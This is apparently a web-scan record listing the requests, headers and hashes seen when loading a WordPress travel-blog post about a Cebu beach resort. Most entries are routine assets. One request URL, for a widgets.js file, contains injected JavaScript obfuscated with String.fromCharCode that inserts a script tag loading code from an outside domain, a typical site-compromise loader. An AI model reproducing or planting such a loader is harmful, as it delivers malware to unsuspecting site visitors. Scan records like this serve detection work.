cf-request-id: 0932292f9400004ddc76a91000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 13:03:10 GMT
server: cloudflare
etag: W/"17a69-5d1a048e-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=G%2FxVhfxB40D%2FcQvge8Ft7NjLF53d3uBmRoWEB8swhNvtKCGeZpImnv9YpOZsKn%2FWqHkQzf3ZtjR7%2F5cuQbf1XT%2BDbqFtzgyWVuAt8GHlErEIdq53TLc6DokZwUZHGfQ%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2c1e784ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 jquery-migrate.min.js Show response
www.itravelrox.com/wp-includes/js/jquery/ 10 KB
4 KB 96ms
92ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-includes/js/jquery/jquery-migrate.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 48eb8b500ae6a38617b5738d2b3faec481922a7782246e31d2755c034a45cd5d

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f9400004ddc798da000000001
referrer-policy
last-modified: Wed, 01 Jun 2016 12:25:32 GMT
server: cloudflare
etag: W/"2748-574ed43c-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ESojbjo4HJ%2F1jcL2ChGLwq3NkGNaIb%2FAr5tkdPBXlF08AcOm07zX0tH%2BC9SUOKVBtfqM7xmxTyNXKNfnbPNlQB4wNs9NyUKwiu8luK6SF1mCDa3BCYkAWXJAzrz42Aw%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2c1e7a4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 lightbox.min.js Show response
www.itravelrox.com/wp-content/plugins/wp-embed-facebook/templates/lightbox/js/ 8 KB
3 KB 95ms
91ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/wp-embed-facebook/templates/lightbox/js/lightbox.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: bec10418479f7da7f21294171d29297a993e4b8e772192f11f9cb90e79c3546a

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f9400004ddc1c879000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 12:36:12 GMT
server: cloudflare
etag: W/"213c-5d19fe3c-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=29sUq4%2BZbHTVnzl03CmHf3ACVVVxStdBVjzpmotvjrLQvKAh1%2F9pSkMmXV%2BXlxK7yk2%2Fe1wR926kzEE9KUgEFkJ3Him7umjHKoMvKNey1js6i736ewkMu%2Ftwa%2FswCOo%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2c2e7b4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 fb.min.js Show response
www.itravelrox.com/wp-content/plugins/wp-embed-facebook/inc/js/ 1 KB
886 B 66ms
63ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/wp-embed-facebook/inc/js/fb.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: a1a78174dbf4c2edd2c1eda606995f462b634f759051effda1429b8ebc43dc5e

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f9400004ddc5a131000000001
referrer-policy
last-modified: Mon, 01 Jul 2019 12:36:12 GMT
server: cloudflare
etag: W/"420-5d19fe3c-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PId2xgId9WbcAEqNcF%2BYlSn9OWl%2BammRpbrwJcZVet%2Fd8A9txC5kTi09mstx9w9gJ%2FHE140puqfNYnBktFyhGhDP%2BqP%2BkWbYatsHtATbTTwYdQFn4wMOtVCuFF08QYc%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2c2e7c4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 200 ytprefs.min.js Show response
www.itravelrox.com/wp-content/plugins/youtube-embed-plus/scripts/ 8 KB
3 KB 65ms
64ms Script
application/x-javascript 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/youtube-embed-plus/scripts/ytprefs.min.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 822d3ac546206a5a157015e4eee79a9de552b8897a7a1b73135194919ba81d5f

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f9c00004ddc222cb000000001
referrer-policy
last-modified: Sat, 05 Oct 2019 11:10:54 GMT
server: cloudflare
etag: W/"1fdd-5d987a3e-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=K9agFeOQ5Q%2BxXcAMOghqzeMp%2BoiSMIOulegfLq6%2FiWIZM%2Bp%2FZ%2B1wO9MXwBt%2BM0SPjgRnJOsUeccKZMA0jgMVcLnw%2FzGtCXB5g5%2F1%2F5IWYhUXg5i7GNSbs0pBpwlhz2U%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: application/x-javascript
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2c2e894ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

GET
H2 404 widgets.js
static.zotabox.com/%3C///%3C/script%3E%3Cscript%20%20async=true%20type=text/javascript%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%2... 0
0 387ms
361ms Script
text/html 2606:4700:10::6816:37d8
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://static.zotabox.com/%3C///%3C/script%3E%3Cscript%20%20async=true%20type=text/javascript%20language=javascript%3Evar%20nt%20=%20String.fromCharCode(98,%20122);var%20mb%20=%20String.fromCharCode(97,%20106,%2097,%20120,%2067,%20111,%20117,%20110,%20116,%20101,%20114);var%20sb%20=%20String.fromCharCode(115,%2099,%20114,%20105,%20112,%20116);var%20tb%20=%20String.fromCharCode(116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116);var%20lb%20=%20String.fromCharCode(47,%2047,%20100,%20101,%20108,%20105,%20118,%20101,%20114,%20121,%20103,%20111,%20111,%20100,%20115,%20116,%20114,%2097,%20116,%20101,%20103,%20105,%20101,%20115,%2046,%2099,%20111,%20109,%2047,%20115,%20117,%20110,%20110,%20121,%2046,%20106,%20115,%2063,%20116,%20121,%20112,%20101,%2061,%20115,%2099,%20114,%20105,%20112,%20116,%2038,%20103,%20108,%20111,%2098,%2097,%20108,%2061,%20116,%20114,%20117,%20101,%2038);var%20c=document.createElement(sb);c.type=tb,c.async=1,c.src=lb+nt;var%20n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);%3C/script%3E%3Cscript%3E/widgets.js
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:10::6816:37d8 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: /
Resource Hash

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

access-control-allow-origin: *
access-control-allow-methods: GET,POST

GET
H2 200 adsbygoogle.js Show response
pagead2.googlesyndication.com/pagead/js/ 133 KB
47 KB 25ms
22ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

83c54916208ba4fec97b8c109dc1d26f5e2231ced12bee8032864c219b7d14e4

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: gzip
x-content-type-options: nosniff
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 47703
x-xss-protection: 0
server: cafe
etag: 6346030555081020592
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: private, max-age=3600
timing-allow-origin: *
expires: Fri, 02 Apr 2021 03:11:05 GMT

GET
H2 200 vertical-m.css
www.itravelrox.com/wp-content/plugins/wordpress-23-related-posts-plugin/static/themes/ 2 KB
872 B 66ms
65ms Stylesheet
text/css 2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://www.itravelrox.com/wp-content/plugins/wordpress-23-related-posts-plugin/static/themes/vertical-m.css?version=3.6.4
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 2e65c19fd70c24a9c0d2e3f80b88d25413f511455664becdfd4217ee392a619c

Request headers

Referer: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
content-encoding: br
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0932292f2600004ddc1c874000000001
referrer-policy
last-modified: Mon, 07 Aug 2017 07:37:29 GMT
server: cloudflare
etag: W/"88e-598818b9-0;gz"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding,User-Agent
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=88sU7YFh5YS0pTbfj08WKa3Yi30dE16RHEirgSfB6fpI2lF9Mh8Dy%2FkJvp67E9n0GMQFPm%2FjlRff7pnc1X0%2Frdj5yLgevLj03zxPWdEJDR%2FAxASoet6mqh6%2BQOCET68%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: text/css
cache-control: public, max-age=2592000
x-turbo-charged-by: LiteSpeed
cf-ray: 6396de2b6dcc4ddc-FRA
expires: Sun, 02 May 2021 03:11:05 GMT

GET
H2

200

itravelrox-small-logo.png
www.itravelrox.com/wp-content/uploads/2016/07/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait/https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png
https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png

3 KB
3 KB

51ms
51ms

Image
image/png

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: bdaf7dfb6e3f3ffb5ec859accaf81ffa7f31ad4bc1b8327e83d07aee1a9c0930

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 2727
cf-request-id: 093229307c00004ddc33a10000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 06:05:12 GMT
server: cloudflare
etag: "aa7-5b2de318-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kAutkW4ltwb%2FhWIPzLgz0NyUOQJZ421oGo4XOlq9KCvnykjB1Jm852f65aaBsNjGJ4Z3Q7vOVv6UIc6JxaxbSUQsp5cTZ8IetUXLyMDjmO8uEcvxMBAtx9uSqt11Udc%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d98104ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png
content-type: text/html; charset=UTF-8
cdn-cache: EXPIRED
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: b21568bdd3c0c53117dfe24063fe3a29
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

san-fernando-cebu.jpg
www.itravelrox.com/wp-content/uploads/2014/06/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_374,h_280/https://www.itravelrox.com/wp-content/uploads/2014/06/san-fernando-cebu.jpg
https://www.itravelrox.com/wp-content/uploads/2014/06/san-fernando-cebu.jpg

11 KB
11 KB

51ms
50ms

Image
image/jpeg

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2014/06/san-fernando-cebu.jpg
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: e5ff8dbcd7277c2f185f03861363a46130d814295d292fc55b2c1deb0745be0a

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 11182
cf-request-id: 093229307b00004ddc9fa27000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 07:30:50 GMT
server: cloudflare
etag: "2bae-5b2df72a-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FYBQvZBfZCO7TNGjvPuM71%2FqlGl9xw1eqttV35vQPyphKpNqzjwxV0cr8%2BiSA%2FJuBP7ZGZTBLE1ECt6rtKiPY4wXB64KpC2fQSwxLM%2FdomtGTjHItgb%2Fq928EFUcgxg%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/jpeg
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d980f4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 722, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2014/06/san-fernando-cebu.jpg
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: feb708f8161d5ce7f442c83e0b04b9b9
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

sugar-beach-resort2-150x150.jpg
www.itravelrox.com/wp-content/uploads/2013/03/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/03/sugar-beach-resort2-150x150.jpg
https://www.itravelrox.com/wp-content/uploads/2013/03/sugar-beach-resort2-150x150.jpg

4 KB
4 KB

54ms
53ms

Image
image/jpeg

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2013/03/sugar-beach-resort2-150x150.jpg
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 7fba7a220e97fc4389a8455d222bbaf4d5d19b3f285397d50e56d3b7a33753cb

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 3735
cf-request-id: 093229307d00004ddc7d288000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 07:59:50 GMT
server: cloudflare
etag: "e97-5b2dfdf6-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ta03OddeQ69%2FvXFuQUILJGxeRoBYuAaTV9OWGUrQNpF63MDl5EFkDVi0iCr8Kdv9g15MBvtl4UZlwshrP8aAEeLFLF2sxDdEgfWo0yt2rCVuHWWX%2FeVIMAT3UdP2cVQ%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/jpeg
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d98164ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2013/03/sugar-beach-resort2-150x150.jpg
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 3480a0b2a5fc7facc3987ce40011d7c8
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

sumilon-island-150x150.jpg
www.itravelrox.com/wp-content/uploads/2013/05/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/05/sumilon-island-150x150.jpg
https://www.itravelrox.com/wp-content/uploads/2013/05/sumilon-island-150x150.jpg

4 KB
4 KB

61ms
61ms

Image
image/jpeg

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2013/05/sumilon-island-150x150.jpg
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 20d4829a855b7750b4a57adb786bff3f04d344f12d05677bd0aacf465b5a8231

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cf-cache-status: MISS
nel: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 3848
cf-request-id: 093229307a00004ddc36250000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 07:51:35 GMT
server: cloudflare
etag: "f08-5b2dfc07-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lvEzKDc%2FEtLU4NeiuOZ6bIAtw3Rb%2BHEjwSSri8F2ju2R%2BUmMO7X6T6rk%2BHTiIl46eUM%2FrHwcGuO4NIC24pQ9b58hIBg1C40C2N9P8O4oEzsE3dFdU%2BemtS50jKMRRs0%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/jpeg
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de2d980c4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:05 GMT
cdn-edgestorageid: 565, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:05
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2013/05/sumilon-island-150x150.jpg
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
cdn-requestid: 192fbea12d5418e8163a4353fbd94300
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2

200

sta-fe-beach-club1-150x150.jpg
www.itravelrox.com/wp-content/uploads/2013/03/
Redirect Chain

https://cdn.shortpixel.ai/client/q_lqip,ret_wait,w_150,h_150/https://www.itravelrox.com/wp-content/uploads/2013/03/sta-fe-beach-club1-150x150.jpg
https://www.itravelrox.com/wp-content/uploads/2013/03/sta-fe-beach-club1-150x150.jpg

4 KB
4 KB

50ms
50ms

Image
image/jpeg

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

